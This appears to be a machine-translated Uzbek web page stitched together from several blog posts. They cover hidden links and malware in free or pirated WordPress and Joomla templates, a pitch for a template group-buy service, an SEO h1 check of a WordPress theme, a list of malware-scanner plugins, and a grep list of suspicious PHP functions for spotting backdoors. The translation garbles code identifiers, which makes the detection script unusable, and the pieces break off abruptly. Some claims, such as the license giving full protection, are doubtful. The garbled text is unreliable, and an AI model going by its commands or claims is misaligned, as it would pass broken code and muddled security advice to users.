Salom, aziz blog o'quvchilari. Hozirgi kunda o'z veb-saytlarini o'zlari yaratadigan (sof Html, o'z dvigatellari yoki hech bo'lmaganda CMS uchun o'z-o'zidan yaratilgan shablonlardan foydalanish) kam sonli veb-ustalar mavjud. Umuman olganda, bu haqiqat, chunki hamma ham munosib narsalarni yaratishga qodir emas - bu dizaynerning iste'dodini talab qiladi. Ko'pincha bu hech bo'lmaganda "juda yaxshi emas", ba'zan esa "shunchaki dahshatli" bo'lib chiqadi.

Shuning uchun mashhur CMS uchun shablonlar yoki dizayn mavzulari (turli dvigatellarda "terilar" turli atamalar bilan atalishi mumkin) juda keng tarqalgan. Ayniqsa, bu yaxshiliklarning ko'pini Internetda Joomla va WordPress uchun topish mumkin, chunki bu RuNetda ham, burjua internetida ham haqli.

Aslida, tayyor shablonlarning kataloglari bilan rus tilidagi juda ko'p manbalar mavjud. Xo'sh, burjuaziyada ularni hisoblashning iloji yo'q. Hammasi juda ajoyib ko'rinadi - dvigatelni o'rnating, mos shablonni toping (pullik shablonlarni bepul topish unchalik qiyin emasligi sir emas), uni yuklab oling va yangi veb-saytingizning professional dizaynidan zavqlaning. Unga qimmatli tarkibni qo'shish qoladi va siz o'zingizning resursingizning Internetda mashhurligini kuzatishingiz mumkin bo'ladi.

Ammo hamma narsa juda oddiy va tushunarli emas. Men uzoq vaqt oldin maqola yozganimda, men o'quvchilardan u yoki bu xizmatni ro'yxatdan olib tashlash bo'yicha tavsiyalarni pochta orqali oldim, chunki u erda e'lon qilinganlarida. shablonlarda yashirin havolalar yoki hatto viruslar topiladi. Ma’lum bo‘lishicha, maqol to‘g‘ri ekan – tekin pishloqni faqat sichqoncha tuzog‘ida topish mumkin. Bepul shablonlarni ishlab chiquvchilar (yoki pullik shablonlarni "nol" qilganlar) shunchaki shu yo'l bilan pul ishlashadi va ko'lami bo'yicha ko'p.

Uchinchi tomon manbalariga (va ko'pincha qidiruv tizimlari tomonidan qora ro'yxatga kiritilgan) yashirin havolalar va undan ham ko'proq viruslar sizning resursingizni targ'ib qilishning barcha umidlarini o'ldirishi mumkin (yoki ularni jiddiy ravishda buzadi va asablaringizni buzadi). Buning uchun siz ham mumkin. Shablonni tanlashda o'zingizni bularning barchasidan qanday himoya qilishingiz mumkin?

Joomla va WordPress uchun bepul shablonlarda nima yomon?

O'z tajribamdan shuni aytishim mumkinki, "havaskor" uchun "professional" bilan raqobat qilish juda qiyin. Ushbu nashrning boshida men ko'pchilik saytlarimni yuqtirgan viruslar haqidagi maqolaga havola berdim. Bu ikki yildan ko'proq vaqt oldin sodir bo'lgan va shu vaqt ichida men "kod tozaligi" uchun epik kurashni bir necha bor takrorladim, lekin bir qator infektsiyalangan resurslarda (yoki ulardan spam yuboriladi) residivlar muntazam ravishda sodir bo'ladi. eshik paydo bo'ldi, keyin men uchun mutlaqo tushunarsiz narsa ro'y bermoqda, bu hostingga juda katta yuk olib keladi).

Shu bilan birga, men ushbu saytlarning kodida qobiq va boshqa orqa eshiklarni qidirish uchun "noob" uchun mavjud bo'lgan barcha usullardan foydalanaman, lekin yana takror aytamanki, havaskor shunchaki professional bilan raqobatlasha olmaydi. Shuning uchun, agar siz shablon orqali o'tib ketgan virusni osongina olib tashlashingiz mumkin deb o'ylasangiz, adashasiz. Bu juda qayg'uli, dahshatli zerikarli masala (virusli faollik, barcha harakatlaringizga qaramay, qayta-qayta paydo bo'lganda) va ko'p vaqt va kuch talab qiladi.

Xuddi shu yashirin havolalarga ham tegishli. Agar siz ularni o'tgan davrdan tanishtirish variantiga duch kelsangiz, yaxshi bo'ladi, agar siz ularni joylashtirish uchun joy topib, ulardan abadiy qutulasiz, natijada toza va bepul shablonga ega bo'lasiz. Aksariyat hollarda hamma narsa ancha murakkab. Yashirin havolalarni qaerga kiritishni topish uchun sizga dasturiy ta'minot kerak bo'ladi (masalan, TAC plagini), lekin u hamma narsaga qodir emas, chunki Joomla va WordPress uchun bepul va pullik (buzilgan) shablonlar orqali havolalarni tarqatish biznesi juda yaxshi daromad keltiradi, Bu esa, bu bilan shug'ullanayotgan odamlarni "xatcho'p" larini kamroq sezadigan yangi echimlarni izlashga undaydi.

Aslida, bugungi kunda "chap havolalar" yaratish uchun shablonni tezda tekshirish juda qiyin bo'lishi mumkin. Misol uchun, siz shablonni yuklab oldingiz, uni saytga joylashtirdingiz, kontent qo'shdingiz va undan shubhali tashqi havolalar (siz kiritmagan) paydo bo'lganligini ko'rishga qaror qildingiz. Ular yo'q. Siz baxtlisiz, bu muammoni unutasiz, saytni to'ldirish va uni targ'ib qilish bilan mashg'ul bo'lasiz, keyin siz tasodifan (o'zingiz yoki qidiruv tizimlarining filtr yoki taqiq ko'rinishidagi signalidan keyin) hali ham yashirin havolalar mavjudligini aniqladingiz. va ular o'zingiz hech qachon murojaat qilishni xayolingizga ham keltirmaydigan shunday "axlat" ga olib keladi.

Bu borada eng haqoratli narsa shundaki filtrni olib tashlash va saytni qidiruv tizimlarining ko'ziga "oqlash" uchun Bu juda uzoq vaqt talab qilishi mumkin (ba'zi hollarda oylar va hatto yillar). Ammo bu erda gap shundaki, bunday "xatcho'plar" ni ishlab chiquvchilar siz ular haqida bilishingizni bilishadi va shablonni o'rnatganingizdan so'ng saytni "har qanday yomon ortiqcha narsalar" uchun tekshirishadi. Shuning uchun ular ushbu havolalarni yaratish boshlanishini bir muncha vaqt sekinlashtiradi, ularning fikricha, hatto eng shubhali foydalanuvchi ham bepul olgan shablonning tozaligiga ishonishi uchun etarli.

Bundan tashqari, yashirin havolalar endi md5 yoki base64 so'zlari yordamida qidirilmaydigan tarzda kodlangan (ko'pincha ular tashqi manbadan yuklanadi). Barcha shablon fayllarini qidirish orqali topib bo'lmaydigan harflar va maxsus belgilar to'plami. Va bu fayllar yuzdan ortiq bo'lishi mumkin. Bundan tashqari, havolalar darhol paydo bo'lmaydi. Ya'ni, aslida, veb-ustaning (o'rtacha) veb-sayt yaratish bosqichida ularni aniqlashning iloji yo'q.

Shablon orqali infektsiyani oldini olish uchun I Men pul to'lashni afzal ko'raman keyinchalik bir qancha muammolarga duch kelmaslik uchun. Yana bir narsa shundaki, siz ko'p pul to'lashingiz mumkin yoki juda ko'p to'lashingiz mumkin emas. Men shaxsan ikkinchi variantni tanlayman, lekin birinchi navbatda birinchisining mohiyatini tushuntiraman.

Biror narsa, albatta, topish mumkin va ushbu dvigatellarning rasmiy omborlarida(bu haqda o'qing va Joomla uchun kengaytmalarning rasmiy veb-saytiga o'ting), lekin, birinchidan, u erda tanlov sezilarli darajada cheklangan, ikkinchidan, butun dunyo bo'ylab yana minglab saytlar bir xil "kiyimlarda" kiyinadilar, bu biroz kamaytiradi. tashrif buyuruvchilar va qidiruv tizimlari nazarida loyihangizning o'ziga xosligi.

Biroq, dunyoda Joomla va WordPress uchun pullik shablonlarni ishlab chiqadigan ko'plab professional kompaniyalar mavjud. Apriori (), ular xatcho'plarga ega bo'lmasligi kerak, aks holda ular darhol mijozlarning obro'si va ishonchini yo'qotadilar. Biroq, bitta shablonning narxi uning funksionalligi va yangiligiga qarab 50-100 dollarni tashkil qilishi mumkin.

Bundan tashqari, to'lov bilan bog'liq ba'zi muammolar paydo bo'lishi mumkin (siz tavakkal qilishingiz va to'g'ridan-to'g'ri plastik kartadan to'lov bilan xarid qilishingiz kerak bo'ladi). Biroq, natijada siz ataylab "toza" shablonni olasiz, bu yaxshi. To'g'ri, u bilan birga keladigan texnik yordam, agar u taqdim etilgan tilni bilsangizgina tegishli bo'ladi. Aksariyat hollarda rus tilini bilish sizga bu masalada yordam bermaydi.

Menga ikkinchi variant ko'proq yoqadi, chunki uning yuqori rentabelligi (sarflangan pulning olingan imkoniyatlarga nisbati), garchi ishlab chiquvchilarga nisbatan u butunlay "oq yuvilgan" emas. Uning mohiyati shundaki, Joomla va WordPress GNU/GPL litsenziyasi ostida tarqatiladi, ya'ni. bepul dasturiy ta'minot uchun litsenziyalar (bunday dasturiy ta'minotdan foydalanish, nusxalash, o'zgartirish va tarqatish mumkin). Aslida, men bu haqda avval boshida aytib o'tilgan Joomla shablonlari haqidagi maqolada yozgan edim.

Haddan tashqari tafsilotlarga berilmasdan, gap shundaki, ushbu dvigatellar uchun kengaytmalar (shablonlar, plaginlar va boshqalar) mualliflarning shaxsiy mulki bo'lishi mumkin emas. Ha, siz ular uchun to'lovni talab qilishingiz mumkin, ammo bu kengaytmalardan ruxsatsiz foydalanish yoki tarqatish uchun endi jazolash yoki jinoiy javobgarlikka tortish mumkin bo'lmaydi. Shunga qaramay, Joomla va WordPress uchun pullik kengaytmalar bozori juda katta mualliflik huquqi qonuni bilan himoyalanmagan. Aksincha, GNU/GPL litsenziyasi sizni ishlab chiquvchidan 100% himoya qiladi.

Aytgancha, ko'plab ishlab chiqish kompaniyalari obuna orqali o'z shablonlariga kirishni ta'minlaydi. Bular. siz ma'lum bir miqdorni to'laysiz va ma'lum vaqt davomida siz ularning barcha yaratganlarini (shablonlari yoki kengaytmalarini) doimiy ravishda yuklab olishingiz va foydalanishni davom ettirishingiz mumkin. Aslida, WordPress uchun mavzularni, shuningdek Joomla uchun shablonlarni xavfsiz olishning ikkinchi usuli taxminan bir xil printsipga asoslanadi.

Yaqinda men bir qator maqolalarda aytib o'tgan do'stim unga "barmog'ini ko'rsatdi" (u bir necha yillardan beri onlayn-do'kon qurish uchun ideal variantni qidirmoqda va shu yo'lda u juda ko'p narsalarni topadi. Menga qiziq tuyuladigan va kelajakda faol foydalaniladigan narsalar) . Biz premium shablonlarni va kengaytmalarni birlashtirish haqida gapiramiz CmsHeaven.org .

Mablag' yig'ishning mohiyati juda oddiy - mahsulotni sotib oling va uni mablag' yig'ishda ishtirok etgan barchaga tarqating. CmsHeaven.org sxemani yanada soddalashtirdi - sizga kerak bo'lgan individual andozalar yoki kengaytmalar uchun to'xtashning hojati yo'q. Siz shunchaki ushbu xizmat ixtiyorida bo'lgan butun katalogga vaqtinchalik kirish uchun haq to'laysiz (qidiruv qulayligi uchun dvigatellar, mualliflar va mavzular bo'yicha bo'lingan bir necha ming nom).

Taqdim etilgan mahsulotlarning har biri ishlab chiquvchilardan omonatchilarning pullari evaziga halol sotib olingan (bepul shablonlar ham mavjud, ammo ular yana reklama maqsadlarida kerak bo'lgan taniqli brendlar tomonidan taqdim etiladi). Va eng muhimi, tashkilotchilar katalogni doimiy ravishda yangi nusxalar bilan yangilab turishadi (ular aytganidek, lahzaning issiqligida), bu esa omma oldida uzoq vaqt kutishga to'g'ri keladi. Bu ko'pchilikka yoqadi.

Umuman olganda, bu siz qo'shilishingiz va barcha imtiyozlardan bahramand bo'lishingiz mumkin bo'lgan kooperativdir. Ammo ba'zi cheklovlar bilan. Gap shundaki, tashkilotchilar cheklovlar kiritmasdan ularning butun katalogi qisqa vaqt ichida ommaga chiqib ketishini yaxshi bilishadi. Shuning uchun sodir bo'ladi oyiga 36 ta yuklab olishni cheklash. Bu oddiy webmaster va hatto veb-sayt yaratuvchi kompaniya uchun etarli.

Bu kafolat beradi yo'qligi taqdim etilgan kengaytmalar va shablonlarda "xatcho'plar"(yashirin havolalar, viruslar, troyanlar va ularning shablonlari yordamida ishlab chiquvchiga sayt haqida ma'lumot beradigan snitchlar). Shuni hisobga olgan holda, faqat ochiq manbaga ega taniqli brendlardan mahsulotlar sotib olinadi, bu erda bularning barchasi tekshirilishi va kerak bo'lganda yo'q qilinishi mumkin.

Ba'zi kengaytmalar rus tiliga tarjima qilingan va agar o'rnatish yoki konfiguratsiya bilan bog'liq muammolar paydo bo'lsa, bu ko'pincha juda zarurdir (siz ko'kdan kelib chiqqan muammoni hal qilish uchun Internetni bir necha marta taragan bo'lishingiz mumkin). . Aytgancha, bu bepul dvigatellarni pulliklardan ajratib turadigan narsa shundaki, foydalanuvchi qo'llab-quvvatlamaydi.

Va siz o'zingizga yoqqan mahsulotlarni oddiy tezlikda va fayl hosting xizmatlaridagi reklamalarni ko'rmasdan yuklab olishingiz mumkin bo'ladi. Bu arzimas narsa, chunki orzu qilingan "yoqimli" ga ega bo'lish uchun siz tog'larni siljitishingiz mumkin va shunchaki fayllarni joylashtirish xizmati bilan kurashishingiz mumkin emas, balki bu arzimas narsalar qulaylikni yaratadi.

Umuman olganda, menga g'oya va uni amalga oshirish juda yoqdi, lekin Joomla va WordPress omborlaridan bepul shablonlardan foydalanishim kerakmi, CmsHeaven.org saytiga qo'shilish kerakmi yoki shablonlarni to'g'ridan-to'g'ri ishlab chiquvchilardan sotib olishim kerakmi? o'zingiz qaror qilishingiz kerak bo'ladi. Faqat "sizdan iltimos qilaman, kechalari xom pomidor yemang", ya'ni hech qanday "ajoyib" resurslardan bepul mahsulotlarni yuklab olmang, chunki siz juda ko'p muammolarga duch kelishingiz mumkin. Sizga kerakmi?

Omad sizga! Tez orada blog sayti sahifalarida ko'rishguncha

Sizni qiziqtirishi mumkin

Maxsus HTML kod moduli yordamida Joomla ishlayotgan saytga tashrif hisoblagich kodini qanday kiritish mumkin yoki to'g'ridan-to'g'ri shablonga
Html, CSS va PHP-ni bilmasdan qanday qilib professional tashrif qog'ozi veb-saytini o'zingiz yaratishingiz mumkin? Javob: MotoCMS!
Kelajakdagi veb-sayt uchun moslashtirilgan shablonni va u bilan intuitiv va tezkor yuklash uchun CMSni qanday olish mumkin
Maqola yozish va chop etishda 10 ta halokatli xato
Forumga kirish uchun Joomla'da menyu elementini yaratish va foydalanuvchi ro'yxatini SMF dan saytga o'tkazish
SMF forumi va Joomla saytini birlashtirish uchun JFusion-ni sozlash
JFusion modullari forumdagi xabarlarni veb-saytda ko'rsatish, shuningdek, Joomla-ga qaytish uchun SMF-da tugma yaratish. WebPoint PRO - bu keng funksionallik va malakali texnik qidiruv tizimini optimallashtirishga ega sezgir WordPress mavzusi
Share42 - saytga ijtimoiy tarmoq tugmalari va xatcho'plarni qo'shish uchun skript (suzuvchi panel varianti mavjud)
SMF forumini o'rnatish - JFusion komponentidan foydalangan holda Joomla 1.5 va Simple Machines Forumni birlashtirish

WordPress saytingizga o'rnatish uchun shablonni tanlaganingizdan so'ng, uning tartibini SEO ning asosiy qoidalariga (optimallashtirish) muvofiqligini tekshirishga arziydi. Masalan, "Yigirma o'n to'rt" qutisi shablonlari vidjet sarlavhalari teglarda ko'rsatilishi uchun yaratilgan.

Sizning ehtiyojlaringizni to'liq qondiradigan tayyor WordPress shablonini topish juda qiyin. Ko'pincha siz tanlangan shablonni yoqtirasiz, lekin uning rang sxemasidan mamnun emassiz yoki yon panel, sarlavha, shrift va boshqalarning joylashuvi sizga yoqmaydi. WP platformasida WordPress shablonini ehtiyojlaringizga mos ravishda o'zgartirish uchun barcha imkoniyatlar mavjud.

Misol uchun, keling, "Twenty Fourteen" deb nomlangan WordPress shablonini o'zgartiraylik. Ushbu shablon amaliy misol bo'lib xizmat qiladi, unda siz nafaqat WordPress shablonlarini nozik sozlash, balki nozik sozlashning barcha nuanslarini ko'rishingiz mumkin.

Shablonni tahrirlashga tayyorlanmoqda

WordPress kodi bilan ishlashdan oldin, shu jumladan ishchi shablonni o'zgartirish uchun siz quyidagilarni qilishingiz va qo'lingizda bo'lishingiz kerak:

• (katalog va ma'lumotlar bazasi);
• Ishchi (tahrirlanadigan) shablonning zaxira nusxasi.

Shablon avval Tashqi ko'rinish → Moslashtirish yorlig'ida sozlangan bo'lishi kerak.

Eslatma: Shablonga doimiy o'zgartirishlar kiritish uchun ga o'tishingiz kerak. WordPress bolalar mavzusida ishlash shablonni o'zgartirishlaringizni yo'qotmasdan yangilash imkonini beradi.

O'zingiz uchun "Twenty Fourteen" WordPress shablonini qanday sozlash mumkin

Men shablonni o'zgartirish tamoyilini ko'rsatishga harakat qilaman, bu sizga har qanday WordPress shabloniga o'z o'zgartirishlaringizni kiritish imkonini beradi.

Shunday qilib, vazifa:"Yigirma o'n to'rt" shabloni mavjud 1-rasm, biz shablonga maxsus o'zgartirishlar kiritamiz va shu bilan birga SEO optimallashtirish qoidalariga muvofiqligini ta'minlash uchun shablonning tartibini tekshiramiz.

Eslatma: Shuni ta'kidlaymanki, ko'plab shablonlarning mualliflari o'zlarining shablonlari uchun qayta sozlanishi mumkin bo'lgan sozlamalarni yaratadilar va sozlamalar interfeysini alohida yorliqda ko'rsatadilar. Bunday shablonlar bilan ishlashda siz shablon kodini o'zgartirmasdan, maxsus shablon sozlamalarini osongina o'rnatishingiz mumkin. Bu maqolada tasvirlangan variant emas.

SEO qoidalari uchun shablon tartibini tekshirish

Keling, avval shablonning tartibini ko'rib chiqaylik. Tekshirishdan oldin taqdim etilgan shablon sozlamalarini o'rnating.

Tartibning SEO qoidalariga muvofiqligini tekshirish uchun bizga kerak bo'ladi:

• Har qanday vidjetni shablonning yon panel(lar)iga joylashtiring. Bu kalendar bo'lsin. Biz, albatta, vidjetga nom beramiz.
• Sinov sahifasi va test sayti postini yarating.

SEO qoidalari uchun shablon tartibini tekshirish qadamlari

1-qadam: Bosh sahifani tekshirish

Muhim! Saytning biron bir sahifasida ikkitadan ortiq h1 teg bo'lmasligi kerak. Bitta ochuvchi

, ikkinchi yopilish

, buni tuzatish kerak. Tuzatish faqat quyida.

Takror aytaman! Saytning biron bir sahifasida ikkitadan ortiq h1 teg bo'lmasligi kerak. Bitta ochuvchi

, ikkinchi yopilish

Qadam 2. Test post sahifasini sinovdan o'tkazish

Saytning asosiy sahifasidan so'ng biz saytning test postini ochamiz. Bu yerda biz faqat post sarlavhasi h1 teglariga o'ralganligini tekshiramiz. Biz tekshirishni sayt posti bilan bir xil tarzda qilamiz. Faqat sahifa sarlavhasi h1 teglari bilan o'ralgan bo'lishi kerak.

3-qadam: Vidjetlarni tekshirish

Xuddi shunday, yon paneldagi va altbilgidagi vidjetlarning sarlavha teglariga qarang.

Tartibni tekshirish natijalari

Natijada, ushbu shablondagi shablon tartibini tekshirib, saytning pastki va yon panelidagi vidjet sarlavhalari h1 teglari bilan o'ralganligini aniqladik. Buni tuzatish kerak.

Agar biz asosiy sahifada maqola e'lonlari h1 teglarida, ya'ni so'nggi xabarlar sahifasida h1da bir nechta sarlavhalar mavjudligini aniqlasak, biz maqolani o'qib chiqamiz va ushbu SEO tartibidagi xatolikni bartaraf qilamiz.

Maqolaning mavzusi men kutganimdan kattaroq bo'lib chiqdi, shuning uchun men WordPress shablonini o'zimga mos ravishda o'zgartirishim kerak, ya'ni uning ko'rinishini o'zgartirishim kerak, biz buni keyingi maqolada qilamiz. Birinchidan, siz maqolalarni o'qishingiz mumkin: WordPress kaskadli uslub fayli uchun tartib qoidalari.

WordPress turli axborot veb-saytlari va bloglarini yaratish uchun eng mashhur vositadir. Veb-saytingiz xavfsizligi ma'lumotlaringiz xavfsizligidan ko'ra ko'proqdir. Bu juda muhimroq, chunki bu sizning manbangizni o'qigan va ishonadigan barcha foydalanuvchilarning xavfsizligi. Shuning uchun sayt viruslar yoki boshqa zararli kodlar bilan zararlangan emasligi juda muhim.

Quyidagi maqolalardan birida WordPress-ni buzishdan qanday himoya qilishni ko'rib chiqamiz, ammo endi men sizga WordPress veb-saytini viruslar va zararli kodlar uchun qanday tekshirish kerakligini aytmoqchiman, bu hamma narsa xavfsiz ekanligiga ishonch hosil qilish uchun.

Aqlga keladigan birinchi variant - sizni xakerlar buzib, spam yuborish, havolalar va boshqa yomon narsalarni yuborish uchun saytingiz kodiga ularning orqa eshiklarini o'rnatganingizdir. Bu ba'zida sodir bo'ladi, lekin agar siz dasturiy ta'minotni o'z vaqtida yangilasangiz, bu juda kam uchraydigan holat.

Minglab bepul WordPress mavzulari va turli plaginlar mavjud va bu allaqachon tahdid bo'lishi mumkin. WordPress saytidan shablonni yuklab olganingizda, bu boshqa narsa, chap saytdan topganingizda esa boshqa narsa. Vijdonsiz ishlab chiquvchilar o'z mahsulotlariga turli xil zararli kodlarni joylashtirishlari mumkin. Agar siz premium shablonlarni bepul yuklab olsangiz, xakerlar hech narsani xavf ostiga qo'ymasdan qandaydir xavfsizlik teshigini qo'shishlari mumkin bo'lsa, xavf yanada kattaroq bo'ladi, ular orqali ular kirib, kerakli narsani qilishlari mumkin. Shuning uchun WordPress saytida viruslarni tekshirish juda muhim.

WordPress saytini viruslar uchun tekshirish

Saytni tekshirishda siz murojaat qilishingiz kerak bo'lgan birinchi narsa viruslar emas, bu WordPress plaginlari. Tez va osonlik bilan siz saytingizni skanerlashingiz va shubhali kod joylarini topishingiz mumkin, ular mavzuda, plaginda yoki Wodpress-ning o'zida bo'ladimi, ularga e'tibor berish kerak. Keling, eng mashhur plaginlarning bir nechtasini ko'rib chiqaylik:

1.TOC

Ushbu juda oddiy plagin saytingizda o'rnatilgan barcha mavzularni ularda zararli kod bor yoki yo'qligini tekshiradi. Plagin base64 kodini kiritish orqali shifrlangan yashirin havolalarni aniqlaydi, shuningdek, topilgan muammolar haqida batafsil ma'lumotlarni ko'rsatadi. Ko'pincha topilgan kod qismlari viruslar emas, lekin ular potentsial xavfli bo'lishi mumkin, shuning uchun ularga e'tibor berishingiz kerak.

Ochiq "Tashqi ko'rinish" -> "TAK" keyin barcha mavzular tekshirilguncha kuting.

2. VIP skaner

TOC mavzu skaneriga juda o'xshaydi, lekin batafsilroq ma'lumotni ko'rsatadi. Havolalar, yashirin kod va boshqa zararli qo'shimchalarni aniqlash uchun bir xil imkoniyatlar. Asboblar bo'limida VIP skaner elementini oching va natijani tahlil qiling.

Bu keraksiz fayllarni o'chirish uchun etarli bo'lishi mumkin, masalan, desktop.ini. Yoki base64 yordamida fayllarda nima sodir bo'lishini batafsil ko'rib chiqishingiz kerak.

3. GOTMLS.NET dan zararli dasturlarga qarshi

Ushbu plagin nafaqat mavzularni va saytning yadrosini viruslarga skanerlash, balki saytni shafqatsiz kuch parollari va turli XSS, SQLInj hujumlaridan himoya qilish imkonini beradi. Qidiruv ma'lum imzolar va zaifliklar asosida amalga oshiriladi. Ba'zi zaifliklar saytda tuzatilishi mumkin. Fayllarni skanerlashni boshlash uchun oching "Malvarega qarshi" yon menyuda va bosing "Skanerlashni ishga tushirish":

Skanerlashni boshlashdan oldin imzo ma'lumotlar bazangizni yangilashingiz kerak.

4. Wordfence

Bu WordPress xavfsizligi va zararli dasturlarni skanerlash uchun eng mashhur plaginlardan biridir. WordPress kodidagi ko'pgina xatcho'plarni topa oladigan skanerga qo'shimcha ravishda, har xil turdagi hujumlar va parolni qo'pol kuch ishlatishdan doimiy himoya mavjud. Qidiruv vaqtida plagin turli plaginlar va mavzular bilan bog'liq mumkin bo'lgan muammolarni topadi va WordPressni yangilash zarurligi haqida xabar beradi.

Yorliqni oching "WPDefence" yon menyuda va keyin yorlig'iga o'ting "Skanerlash" va bosing "Skanerlashni boshlash":

Skanerlash biroz vaqt talab qilishi mumkin, ammo tugallangach, topilgan muammolar haqida batafsil hisobotni ko'rasiz.

5. Antivirus

Bu sizning veb-saytingiz shablonini zararli kod uchun skanerlaydigan yana bir oddiy plagin. Kamchilik shundaki, faqat joriy shablon skanerdan o'tkaziladi, ammo ma'lumotlar etarli darajada batafsil ko'rsatiladi. Mavzudagi barcha xavfli funktsiyalarni ko'rasiz va keyin ular biron bir xavf tug'diradimi yoki yo'qligini batafsil tahlil qilishingiz mumkin. Element toping "Antivirus" sozlamalarida va keyin bosing "Mavzu shablonlarini hozir skanerlang":

6. Integrity Checker

Virus allaqachon biror joyda yozilgan bo'lsa, WordPress fayllari yaxlitligini tekshirish tavsiya etiladi. Buning uchun Integrity Checker plaginidan foydalanishingiz mumkin. U barcha asosiy, plagin va shablon fayllaridagi o'zgarishlarni tekshiradi. Skanerlash oxirida siz o'zgartirilgan fayllar haqida ma'lumotni ko'rasiz.

Onlayn xizmatlar

Bundan tashqari, WordPress saytida virus borligini tekshirish yoki faqat shablonni tekshirish imkonini beruvchi bir nechta onlayn xizmatlar mavjud. Mana ulardan ba'zilari:

themecheck.org- siz mavzu arxivini yuklab olasiz va unda ishlatilishi mumkin bo'lgan zararli funktsiyalar haqida barcha ogohlantirishlarni ko'rishingiz mumkin. Siz nafaqat mavzuingiz haqidagi ma'lumotlarni, balki boshqa foydalanuvchilar tomonidan yuklangan boshqa mavzular, shuningdek, mavzuning turli versiyalari haqida ham ko'rishingiz mumkin. Plaginlar nima bo'lishidan qat'i nazar, ushbu saytdan topish mumkin. WordPress mavzusini tekshirish ham juda muhim.

virustotal.com- veb-saytingiz yoki shablon faylini viruslarga tekshirishingiz mumkin bo'lgan taniqli manba.

ReScan.pro- ushbu xizmatdan foydalangan holda WordPress saytini viruslar uchun skanerlash bepul; mumkin bo'lgan yo'nalishlarni aniqlash uchun statik va dinamik tahlillar amalga oshiriladi; skaner sayt sahifalarini ochadi. Saytni turli qora ro'yxatlarga qarshi tekshiradi.

sitecheck.sucuri.net- saytlar va mavzularni viruslar uchun skanerlash uchun oddiy xizmat. WordPress uchun plagin mavjud. Xavfli havolalar va skriptlarni aniqlaydi.

Qo'lda tekshirish

Hech narsa qo'lda tekshirishdan yaxshiroq bo'lishi mumkin emas. Linuxda ushbu ajoyib grep yordam dasturi mavjud bo'lib, u fayllar bilan papkada ixtiyoriy satrlarni qidirish imkonini beradi. Biz nimani qidirayotganimizni tushunish qoladi:

eval - bu funksiya o'zboshimchalik bilan PHP kodini bajarishga imkon beradi, u o'zini hurmat qiladigan mahsulotlar tomonidan ishlatilmaydi; agar plaginlardan biri yoki mavzu ushbu funktsiyadan foydalansa, unda virus borligi deyarli 100% ehtimolga ega;

• base64_decode- shifrlash funksiyalari zararli kodni yashirish uchun eval bilan birgalikda ishlatilishi mumkin, lekin ular tinch maqsadlarda ham ishlatilishi mumkin, shuning uchun ehtiyot bo'ling;
• sha1- zararli kodni shifrlashning boshqa usuli;
• gzinflate- siqish funktsiyasi, bir xil maqsadlar, baholash bilan birga, masalan, gzinflate(base64_decode(code);
• strrev- chiziqni oldin emas, orqaga buradi, chunki ibtidoiy shifrlash uchun variantdan foydalanish mumkin;
• chop etish- ma'lumotni brauzerga chiqaradi, gzinflate yoki base64_decode bilan birgalikda bu xavfli;
• file_put_contents- WordPressning o'zi yoki plaginlari hali ham fayl tizimida fayllarni yaratishi mumkin, ammo agar mavzu buni qilsa, siz ehtiyot bo'lishingiz va nima uchun bunday qilishini tekshirishingiz kerak, chunki viruslar o'rnatilishi mumkin;
• file_get_contents- aksariyat hollarda tinch maqsadlarda foydalaniladi, lekin zararli kodni yuklab olish yoki fayllardan ma'lumotlarni o'qish uchun ishlatilishi mumkin;
• jingalak- xuddi shu hikoya;
• fopen- faylni yozish uchun ochadi, siz hech qachon nima maqsadda bilasiz;
• tizimi- funktsiya Linux tizimida buyruqni bajaradi, agar mavzu, plagin yoki wordpressning o'zi buni qilsa, u erda virus bo'lishi mumkin;
• ramziy bog'lanish- tizimda ramziy havolalar yaratadi, ehtimol virus asosiy fayl tizimini tashqaridan kirishga harakat qilmoqda;
• nusxa ko'chirish- faylni bir joydan ikkinchi joyga ko'chiradi;
• getcwd- joriy ishchi katalog nomini qaytaradi;
• cwd- joriy ishchi papkani o'zgartiradi;
• ini_get- PHP sozlamalari haqida ma'lumot oladi, ko'pincha tinch maqsadlarda, lekin siz hech qachon bilmaysiz;
• xato_hisoboti(0)- har qanday xato xabarlarini chiqarishni o'chiradi;
• window.top.joy.href- boshqa sahifalarga yo'naltirish uchun foydalaniladigan javascript funksiyasi;
• buzilgan- shuning uchun, har qanday holatda, biz tekshiramiz, to'satdan xakerning o'zi bizga aytishga qaror qildi.

Har bir alohida so'zni quyidagi kabi buyruq bilan almashtirishingiz mumkin:

grep -R "buzilgan" /var/www/path/to/files/wordpress/wp-content/

Yoki bir vaqtning o'zida barcha so'zlarni qidiradigan oddiy skriptdan foydalaning:

qadriyatlar = "base64_decode(
baholash (base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.joy.href
nusxa (
baho(
tizimi (
ramziy havola (
xato_hisoboti(0)
chop etish
file_get_contents(
file_put_contents(
fopen(
buzilgan"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$qiymatlar" *

Salom do'stlar. Veb-saytlaringiz va bloglaringiz uchun ishlatadigan bepul WordPress shabloningiz haqiqatan ham xavfsiz va yashirin tahdidlar yoki zararli kodlarni o'z ichiga olmaydi. Bunga to'liq ishonchingiz komilmi? Albatta?)

Siz shablonni bosib o'tdingiz, undan yashirin havolalarni olib tashladingiz va ish tugadi deb o'ylaysiz. Siz vaqti-vaqti bilan sayt fayllarini antivirus yordamida skanerlaysiz, Xavfsizlik yorlig'ida Yandex veb-master vositalarini ko'rib chiqasiz va u erda xabarni ko'rishdan xotirjam bo'lasiz: " Saytda hech qanday zararli kod aniqlanmadi«.

Men ham shunday deb o'yladim. Men sizni xafa qilishni xohlamayman, lekin ...

Bepul WordPress shablonlarida yashirin xavfli kod

Bu o'tgan hafta mening hosting kompaniyamdan elektron pochta orqali olgan xat. Yaqinda ular zararli kontentni qidirish uchun barcha sayt fayllarini muntazam tekshirishni joriy qilishdi va ular mendan bu tarkibni topdilar!

Hammasi bir kuni tushdan keyin veb-saytimga kirganimda va uni ishga tushira olmaganimda boshlandi — PHP kengaytmasi topilmagan fayllar haqida haqoratomuz xabar paydo bo'ldi. Bir oz taranglashib, men hostingdagi sayt bilan papkaning mazmunini o'rganishga bordim va darhol muammoni topdim - mening shablon faylim fuctions.php nomini functions.php.malware deb o'zgartirdim, bu noaniq ishora qilgandek tuyuldi - antivirus bu erda ishlayman yoki shunga o'xshash narsa) Pochtaga borib, men yuqoridagi hisobotni hosterdan topdim.

